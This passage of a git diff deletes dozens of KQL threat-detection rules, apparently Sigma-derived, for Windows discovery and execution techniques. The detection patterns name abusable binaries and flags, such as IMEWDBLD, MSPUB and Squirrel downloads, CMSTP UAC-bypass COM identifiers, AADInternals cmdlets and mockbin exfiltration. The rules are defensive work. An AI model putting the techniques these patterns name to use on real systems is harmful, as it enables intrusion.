-// Level: medium
-// Description: Detects the execution of "whoami.exe" with the "/FO" flag to choose CSV as output format or with redirection options to export the results to a file for later use.
-// Tags: attack.discovery, attack.t1033, car.2016-03-001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " /FO CSV" or ProcessCommandLine contains " -FO CSV") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe")) or ProcessCommandLine =~ "*whoami*>*"
\ No newline at end of file
diff --git a/Discovery/Whoami_Utility_Execution.kql b/Discovery/Whoami_Utility_Execution.kql
deleted file mode 100644
index 674c5dcc..00000000
--- a/Discovery/Whoami_Utility_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018/08/13
-// Level: low
-// Description: Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation
-// Tags: attack.discovery, attack.t1033, car.2016-03-001
-DeviceProcessEvents
-| where FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe"
\ No newline at end of file
diff --git a/Execution/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql b/Execution/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql
deleted file mode 100644
index 5a91ee73..00000000
--- a/Execution/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/23
-// Level: high
-// Description: Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.
-// Tags: attack.execution, attack.reconnaissance, attack.discovery, attack.credential_access, attack.impact
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Add-AADInt" or ProcessCommandLine contains "ConvertTo-AADInt" or ProcessCommandLine contains "Disable-AADInt" or ProcessCommandLine contains "Enable-AADInt" or ProcessCommandLine contains "Export-AADInt" or ProcessCommandLine contains "Get-AADInt" or ProcessCommandLine contains "Grant-AADInt" or ProcessCommandLine contains "Install-AADInt" or ProcessCommandLine contains "Invoke-AADInt" or ProcessCommandLine contains "Join-AADInt" or ProcessCommandLine contains "New-AADInt" or ProcessCommandLine contains "Open-AADInt" or ProcessCommandLine contains "Read-AADInt" or ProcessCommandLine contains "Register-AADInt" or ProcessCommandLine contains "Remove-AADInt" or ProcessCommandLine contains "Restore-AADInt" or ProcessCommandLine contains "Search-AADInt" or ProcessCommandLine contains "Send-AADInt" or ProcessCommandLine contains "Set-AADInt" or ProcessCommandLine contains "Start-AADInt" or ProcessCommandLine contains "Update-AADInt") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.Exe", "pwsh.dll")))
\ No newline at end of file
diff --git a/Execution/Abusable_DLL_Potential_Sideloading_From_Suspicious_Location.kql b/Execution/Abusable_DLL_Potential_Sideloading_From_Suspicious_Location.kql
deleted file mode 100644
index 51893a0d..00000000
--- a/Execution/Abusable_DLL_Potential_Sideloading_From_Suspicious_Location.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/07/11
-// Level: high
-// Description: Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations
-// Tags: attack.execution, attack.t1059
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\coreclr.dll" or FolderPath endswith "\\facesdk.dll" or FolderPath endswith "\\HPCustPartUI.dll" or FolderPath endswith "\\libcef.dll" or FolderPath endswith "\\ZIPDLL.dll") and ((FolderPath contains ":\\Perflogs\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains "\\Temporary Internet" or FolderPath contains "\\Windows\\Temp\\") or ((FolderPath contains ":\\Users\\" and FolderPath contains "\\Favorites\\") or (FolderPath contains ":\\Users\\" and FolderPath contains "\\Favourites\\") or (FolderPath contains ":\\Users\\" and FolderPath contains "\\Contacts\\") or (FolderPath contains ":\\Users\\" and FolderPath contains "\\Pictures\\")))
\ No newline at end of file
diff --git a/Execution/Active_Directory_Kerberos_DLL_Loaded_Via_Office_Application.kql b/Execution/Active_Directory_Kerberos_DLL_Loaded_Via_Office_Application.kql
deleted file mode 100644
index 354e0360..00000000
--- a/Execution/Active_Directory_Kerberos_DLL_Loaded_Via_Office_Application.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Antonlovesdnb
-// Date: 2020/02/19
-// Level: medium
-// Description: Detects Kerberos DLL being loaded by an Office Product
-// Tags: attack.execution, attack.t1204.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\kerberos.dll" and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe")
\ No newline at end of file
diff --git a/Execution/Active_Directory_Parsing_DLL_Loaded_Via_Office_Application.kql b/Execution/Active_Directory_Parsing_DLL_Loaded_Via_Office_Application.kql
deleted file mode 100644
index fb608553..00000000
--- a/Execution/Active_Directory_Parsing_DLL_Loaded_Via_Office_Application.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Antonlovesdnb
-// Date: 2020/02/19
-// Level: medium
-// Description: Detects DSParse DLL being loaded by an Office Product
-// Tags: attack.execution, attack.t1204.002
-DeviceImageLoadEvents
-| where FolderPath contains "\\dsparse.dll" and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe")
\ No newline at end of file
diff --git a/Execution/Add_Insecure_Download_Source_To_Winget.kql b/Execution/Add_Insecure_Download_Source_To_Winget.kql
deleted file mode 100644
index 65afca78..00000000
--- a/Execution/Add_Insecure_Download_Source_To_Winget.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/04/17
-// Level: high
-// Description: Detects usage of winget to add a new insecure (http) download source.
-Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)
-
-// Tags: attack.defense_evasion, attack.execution, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains "source " and ProcessCommandLine contains "add " and ProcessCommandLine contains "http://") and (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe")
\ No newline at end of file
diff --git a/Execution/Add_New_Download_Source_To_Winget.kql b/Execution/Add_New_Download_Source_To_Winget.kql
deleted file mode 100644
index cc0181f1..00000000
--- a/Execution/Add_New_Download_Source_To_Winget.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/04/17
-// Level: medium
-// Description: Detects usage of winget to add new additional download sources
-// Tags: attack.defense_evasion, attack.execution, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains "source " and ProcessCommandLine contains "add ") and (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe")
\ No newline at end of file
diff --git a/Execution/Add_Potential_Suspicious_New_Download_Source_To_Winget.kql b/Execution/Add_Potential_Suspicious_New_Download_Source_To_Winget.kql
deleted file mode 100644
index 2fc70f43..00000000
--- a/Execution/Add_Potential_Suspicious_New_Download_Source_To_Winget.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/04/17
-// Level: medium
-// Description: Detects usage of winget to add new potentially suspicious download sources
-// Tags: attack.defense_evasion, attack.execution, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains "source " and ProcessCommandLine contains "add ") and (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe") and ProcessCommandLine matches regex "://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}"
\ No newline at end of file
diff --git a/Execution/Add_Windows_Capability_Via_PowerShell_Cmdlet.kql b/Execution/Add_Windows_Capability_Via_PowerShell_Cmdlet.kql
deleted file mode 100644
index bc9b3253..00000000
--- a/Execution/Add_Windows_Capability_Via_PowerShell_Cmdlet.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/22
-// Level: medium
-// Description: Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others.
-// Tags: attack.execution
-DeviceProcessEvents
-| where ProcessCommandLine contains "OpenSSH." and ProcessCommandLine contains "Add-WindowsCapability" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Execution/Application_Removed_Via_Wmic.EXE.kql b/Execution/Application_Removed_Via_Wmic.EXE.kql
deleted file mode 100644
index 4ef64bab..00000000
--- a/Execution/Application_Removed_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/28
-// Level: medium
-// Description: Uninstall an application with wmic
-// Tags: attack.execution, attack.t1047
-DeviceProcessEvents
-| where (ProcessCommandLine contains "call" or ProcessCommandLine contains "uninstall") and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/Execution/Application_Terminated_Via_Wmic.EXE.kql b/Execution/Application_Terminated_Via_Wmic.EXE.kql
deleted file mode 100644
index e0c3848d..00000000
--- a/Execution/Application_Terminated_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/09/11
-// Level: medium
-// Description: Detects calls to the "terminate" function via wmic in order to kill an application
-// Tags: attack.execution, attack.t1047
-DeviceProcessEvents
-| where (ProcessCommandLine contains "call" and ProcessCommandLine contains "terminate") and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/Execution/Arbitrary_Binary_Execution_Using_GUP_Utility.kql b/Execution/Arbitrary_Binary_Execution_Using_GUP_Utility.kql
deleted file mode 100644
index efb673dc..00000000
--- a/Execution/Arbitrary_Binary_Execution_Using_GUP_Utility.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/10
-// Level: medium
-// Description: Detects execution of the Notepad++ updater (gup) to launch other commands or executables
-// Tags: attack.execution
-DeviceProcessEvents
-| where (FolderPath endswith "\\explorer.exe" and InitiatingProcessFolderPath endswith "\\gup.exe") and (not(((ProcessCommandLine contains "\\Notepad++\\notepad++.exe" and FolderPath endswith "\\explorer.exe") or isnull(ProcessCommandLine) or InitiatingProcessFolderPath contains "\\Notepad++\\updater\\")))
\ No newline at end of file
diff --git a/Execution/Arbitrary_Command_Execution_Using_WSL.kql b/Execution/Arbitrary_Command_Execution_Using_WSL.kql
deleted file mode 100644
index caf25951..00000000
--- a/Execution/Arbitrary_Command_Execution_Using_WSL.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/10/05
-// Level: medium
-// Description: Detects potential abuse of Windows Subsystem for Linux (WSL) binary as a LOLBIN to execute arbitrary Linux or Windows commands
-// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " -e " or ProcessCommandLine contains " --exec" or ProcessCommandLine contains " --system" or ProcessCommandLine contains " --shell-type " or ProcessCommandLine contains " /mnt/c" or ProcessCommandLine contains " --user root" or ProcessCommandLine contains " -u root" or ProcessCommandLine contains "--debug-shell") and (FolderPath endswith "\\wsl.exe" or ProcessVersionInfoOriginalFileName =~ "wsl.exe")) and (not(((ProcessCommandLine contains " -d " and ProcessCommandLine contains " -e kill ") and InitiatingProcessFolderPath endswith "\\cmd.exe")))
\ No newline at end of file
diff --git a/Execution/Arbitrary_File_Download_Via_IMEWDBLD.EXE.kql b/Execution/Arbitrary_File_Download_Via_IMEWDBLD.EXE.kql
deleted file mode 100644
index 124d7a9b..00000000
--- a/Execution/Arbitrary_File_Download_Via_IMEWDBLD.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2023/11/09
-// Level: high
-// Description: Detects usage of "IMEWDBLD.exe" to download arbitrary files
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\IMEWDBLD.exe" or ProcessVersionInfoOriginalFileName =~ "imewdbld.exe")
\ No newline at end of file
diff --git a/Execution/Arbitrary_File_Download_Via_MSEDGE_PROXY.EXE.kql b/Execution/Arbitrary_File_Download_Via_MSEDGE_PROXY.EXE.kql
deleted file mode 100644
index f28e5897..00000000
--- a/Execution/Arbitrary_File_Download_Via_MSEDGE_PROXY.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2023/11/09
-// Level: medium
-// Description: Detects usage of "msedge_proxy.exe" to download arbitrary files
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\msedge_proxy.exe" or ProcessVersionInfoOriginalFileName =~ "msedge_proxy.exe")
\ No newline at end of file
diff --git a/Execution/Arbitrary_File_Download_Via_MSOHTMED.EXE.kql b/Execution/Arbitrary_File_Download_Via_MSOHTMED.EXE.kql
deleted file mode 100644
index 03309431..00000000
--- a/Execution/Arbitrary_File_Download_Via_MSOHTMED.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/19
-// Level: medium
-// Description: Detects usage of "MSOHTMED" to download arbitrary files
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\MSOHTMED.exe" or ProcessVersionInfoOriginalFileName =~ "MsoHtmEd.exe")
\ No newline at end of file
diff --git a/Execution/Arbitrary_File_Download_Via_MSPUB.EXE.kql b/Execution/Arbitrary_File_Download_Via_MSPUB.EXE.kql
deleted file mode 100644
index 6f5fc727..00000000
--- a/Execution/Arbitrary_File_Download_Via_MSPUB.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/19
-// Level: medium
-// Description: Detects usage of "MSPUB" (Microsoft Publisher) to download arbitrary files
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\MSPUB.exe" or ProcessVersionInfoOriginalFileName =~ "MSPUB.exe")
\ No newline at end of file
diff --git a/Execution/Arbitrary_File_Download_Via_PresentationHost.EXE.kql b/Execution/Arbitrary_File_Download_Via_PresentationHost.EXE.kql
deleted file mode 100644
index 3f3dd72d..00000000
--- a/Execution/Arbitrary_File_Download_Via_PresentationHost.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/19
-// Level: medium
-// Description: Detects usage of "PresentationHost" which is a utility that runs ".xbap" (Browser Applications) files to download arbitrary files
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "ftp://") and (FolderPath endswith "\\presentationhost.exe" or ProcessVersionInfoOriginalFileName =~ "PresentationHost.exe")
\ No newline at end of file
diff --git a/Execution/Arbitrary_File_Download_Via_Squirrel.EXE.kql b/Execution/Arbitrary_File_Download_Via_Squirrel.EXE.kql
deleted file mode 100644
index b4580a08..00000000
--- a/Execution/Arbitrary_File_Download_Via_Squirrel.EXE.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community
-// Date: 2022/06/09
-// Level: medium
-// Description: Detects the usage of the "Squirrel.exe" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)
-
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains " --download " or ProcessCommandLine contains " --update " or ProcessCommandLine contains " --updateRollback=") and ProcessCommandLine contains "http" and (FolderPath endswith "\\squirrel.exe" or FolderPath endswith "\\update.exe")
\ No newline at end of file
diff --git a/Execution/Arbitrary_MSI_Download_Via_Devinit.EXE.kql b/Execution/Arbitrary_MSI_Download_Via_Devinit.EXE.kql
deleted file mode 100644
index 8441648d..00000000
--- a/Execution/Arbitrary_MSI_Download_Via_Devinit.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/01/11
-// Level: medium
-// Description: Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system
-// Tags: attack.execution, attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains " -t msi-install " and ProcessCommandLine contains " -i http"
\ No newline at end of file
diff --git a/Execution/Arbitrary_Shell_Command_Execution_Via_Settingcontent-Ms.kql b/Execution/Arbitrary_Shell_Command_Execution_Via_Settingcontent-Ms.kql
deleted file mode 100644
index c2a5c681..00000000
--- a/Execution/Arbitrary_Shell_Command_Execution_Via_Settingcontent-Ms.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sreeman
-// Date: 2020/03/13
-// Level: medium
-// Description: The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.
-// Tags: attack.t1204, attack.t1566.001, attack.execution, attack.initial_access
-DeviceProcessEvents
-| where ProcessCommandLine contains ".SettingContent-ms" and (not(ProcessCommandLine contains "immersivecontrolpanel"))
\ No newline at end of file
diff --git a/Execution/Assembly_DLL_Creation_Via_AspNetCompiler.kql b/Execution/Assembly_DLL_Creation_Via_AspNetCompiler.kql
deleted file mode 100644
index 76fa5460..00000000
--- a/Execution/Assembly_DLL_Creation_Via_AspNetCompiler.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/14
-// Level: medium
-// Description: Detects the creation of new DLL assembly files by "aspnet_compiler.exe", which could be a sign of "aspnet_compiler" abuse to proxy execution through a build provider.
-
-// Tags: attack.execution
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\aspnet_compiler.exe" and (FolderPath contains "\\Temporary ASP.NET Files\\" and FolderPath contains "\\assembly\\tmp\\" and FolderPath contains ".dll")
\ No newline at end of file
diff --git a/Execution/Base64_MZ_Header_In_CommandLine.kql b/Execution/Base64_MZ_Header_In_CommandLine.kql
deleted file mode 100644
index ab64782f..00000000
--- a/Execution/Base64_MZ_Header_In_CommandLine.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/12
-// Level: high
-// Description: Detects encoded base64 MZ header in the commandline
-// Tags: attack.execution
-DeviceProcessEvents
-| where ProcessCommandLine contains "TVqQAAMAAAAEAAAA" or ProcessCommandLine contains "TVpQAAIAAAAEAA8A" or ProcessCommandLine contains "TVqAAAEAAAAEABAA" or ProcessCommandLine contains "TVoAAAAAAAAAAAAA" or ProcessCommandLine contains "TVpTAQEAAAAEAAAA"
\ No newline at end of file
diff --git a/Execution/Binary_Proxy_Execution_Via_Dotnet-Trace.EXE.kql b/Execution/Binary_Proxy_Execution_Via_Dotnet-Trace.EXE.kql
deleted file mode 100644
index 75e530fc..00000000
--- a/Execution/Binary_Proxy_Execution_Via_Dotnet-Trace.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jimmy Bayne (@bohops)
-// Date: 2024/01/02
-// Level: medium
-// Description: Detects commandline arguments for executing a child process via dotnet-trace.exe
-// Tags: attack.execution, attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-- " and ProcessCommandLine contains "collect") and (FolderPath endswith "\\dotnet-trace.exe" or ProcessVersionInfoOriginalFileName =~ "dotnet-trace.dll")
\ No newline at end of file
diff --git a/Execution/BloodHound_Collection_Files.kql b/Execution/BloodHound_Collection_Files.kql
deleted file mode 100644
index 2dd9a6ed..00000000
--- a/Execution/BloodHound_Collection_Files.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: C.J. May
-// Date: 2022/08/09
-// Level: high
-// Description: Detects default file names outputted by the BloodHound collection tool SharpHound
-// Tags: attack.discovery, attack.t1087.001, attack.t1087.002, attack.t1482, attack.t1069.001, attack.t1069.002, attack.execution, attack.t1059.001
-DeviceFileEvents
-| where (FolderPath endswith "BloodHound.zip" or FolderPath endswith "_computers.json" or FolderPath endswith "_containers.json" or FolderPath endswith "_domains.json" or FolderPath endswith "_gpos.json" or FolderPath endswith "_groups.json" or FolderPath endswith "_ous.json" or FolderPath endswith "_users.json") and (not((InitiatingProcessFolderPath endswith "\\svchost.exe" and FolderPath endswith "\\pocket_containers.json" and FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.")))
\ No newline at end of file
diff --git a/Execution/Blue_Mockingbird_-_Registry.kql b/Execution/Blue_Mockingbird_-_Registry.kql
deleted file mode 100644
index 8d23eb90..00000000
--- a/Execution/Blue_Mockingbird_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Trent Liffick (@tliffick)
-// Date: 2020/05/14
-// Level: high
-// Description: Attempts to detect system changes made by Blue Mockingbird
-// Tags: attack.execution, attack.t1112, attack.t1047
-DeviceRegistryEvents
-| where RegistryKey endswith "\\CurrentControlSet\\Services\\wercplsupport\\Parameters\\ServiceDll"
\ No newline at end of file
diff --git a/Execution/CLR_DLL_Loaded_Via_Office_Applications.kql b/Execution/CLR_DLL_Loaded_Via_Office_Applications.kql
deleted file mode 100644
index db543222..00000000
--- a/Execution/CLR_DLL_Loaded_Via_Office_Applications.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Antonlovesdnb
-// Date: 2020/02/19
-// Level: medium
-// Description: Detects CLR DLL being loaded by an Office Product
-// Tags: attack.execution, attack.t1204.002
-DeviceImageLoadEvents
-| where FolderPath contains "\\clr.dll" and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe")
\ No newline at end of file
diff --git a/Execution/CMSTP_Execution_Process_Creation.kql b/Execution/CMSTP_Execution_Process_Creation.kql
deleted file mode 100644
index 32254f8e..00000000
--- a/Execution/CMSTP_Execution_Process_Creation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nik Seetharaman
-// Date: 2018/07/16
-// Level: high
-// Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
-// Tags: attack.defense_evasion, attack.execution, attack.t1218.003, attack.g0069, car.2019-04-001
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\cmstp.exe"
\ No newline at end of file
diff --git a/Execution/CMSTP_Execution_Registry_Event.kql b/Execution/CMSTP_Execution_Registry_Event.kql
deleted file mode 100644
index fc5cd431..00000000
--- a/Execution/CMSTP_Execution_Registry_Event.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nik Seetharaman
-// Date: 2018/07/16
-// Level: high
-// Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
-// Tags: attack.defense_evasion, attack.execution, attack.t1218.003, attack.g0069, car.2019-04-001
-DeviceRegistryEvents
-| where RegistryKey contains "\\cmmgr32.exe"
\ No newline at end of file
diff --git a/Execution/CMSTP_UAC_Bypass_via_COM_Object_Access.kql b/Execution/CMSTP_UAC_Bypass_via_COM_Object_Access.kql
deleted file mode 100644
index b950101f..00000000
--- a/Execution/CMSTP_UAC_Bypass_via_COM_Object_Access.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nik Seetharaman, Christian Burkard (Nextron Systems)
-// Date: 2019/07/31
-// Level: high
-// Description: Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)
-// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, attack.t1218.003, attack.g0069, car.2019-04-001
-DeviceProcessEvents
-| where (ProcessIntegrityLevel in~ ("High", "System")) and (InitiatingProcessCommandLine contains " /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" or InitiatingProcessCommandLine contains " /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}" or InitiatingProcessCommandLine contains " /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}" or InitiatingProcessCommandLine contains " /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}" or InitiatingProcessCommandLine contains " /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}") and InitiatingProcessFolderPath endswith "\\DllHost.exe"
\ No newline at end of file
diff --git a/Execution/CSExec_Service_File_Creation.kql b/Execution/CSExec_Service_File_Creation.kql
deleted file mode 100644
index 84508a03..00000000
--- a/Execution/CSExec_Service_File_Creation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/04
-// Level: medium
-// Description: Detects default CSExec service filename which indicates CSExec service installation and execution
-// Tags: attack.execution, attack.t1569.002, attack.s0029
-DeviceFileEvents
-| where FolderPath endswith "\\csexecsvc.exe"
\ No newline at end of file
diff --git a/Execution/Certificate_Exported_Via_PowerShell.kql b/Execution/Certificate_Exported_Via_PowerShell.kql
deleted file mode 100644
index 3d1a911f..00000000
--- a/Execution/Certificate_Exported_Via_PowerShell.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/18
-// Level: medium
-// Description: Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.
-// Tags: attack.credential_access, attack.execution, attack.t1552.004, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "Export-PfxCertificate " or ProcessCommandLine contains "Export-Certificate "
\ No newline at end of file
diff --git a/Execution/Change_PowerShell_Policies_to_an_Insecure_Level.kql b/Execution/Change_PowerShell_Policies_to_an_Insecure_Level.kql
deleted file mode 100644
index 51b9c6c2..00000000
--- a/Execution/Change_PowerShell_Policies_to_an_Insecure_Level.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/11/01
-// Level: medium
-// Description: Detects changing the PowerShell script execution policy to a potentially insecure level using the "-ExecutionPolicy" flag.
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) and (ProcessCommandLine contains "Bypass" or ProcessCommandLine contains "Unrestricted") and (ProcessCommandLine contains "-executionpolicy " or ProcessCommandLine contains " -ep " or ProcessCommandLine contains " -exec ")
\ No newline at end of file
diff --git a/Execution/Chromium_Browser_Headless_Execution_To_Mockbin_Like_Site.kql b/Execution/Chromium_Browser_Headless_Execution_To_Mockbin_Like_Site.kql
deleted file mode 100644
index 63468599..00000000
--- a/Execution/Chromium_Browser_Headless_Execution_To_Mockbin_Like_Site.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/09/11
-// Level: high
-// Description: Detects the execution of a Chromium based browser process with the "headless" flag and a URL pointing to the mockbin.org service (which can be used to exfiltrate data).
-// Tags: attack.execution
-DeviceProcessEvents
-| where ProcessCommandLine contains "--headless" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe") and (ProcessCommandLine contains "://run.mocky" or ProcessCommandLine contains "://mockbin")
\ No newline at end of file
diff --git a/Execution/Cmd.EXE_Missing_Space_Characters_Execution_Anomaly.kql b/Execution/Cmd.EXE_Missing_Space_Characters_Execution_Anomaly.kql
deleted file mode 100644
index b601c089..00000000
--- a/Execution/Cmd.EXE_Missing_Space_Characters_Execution_Anomaly.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/08/23
-// Level: high
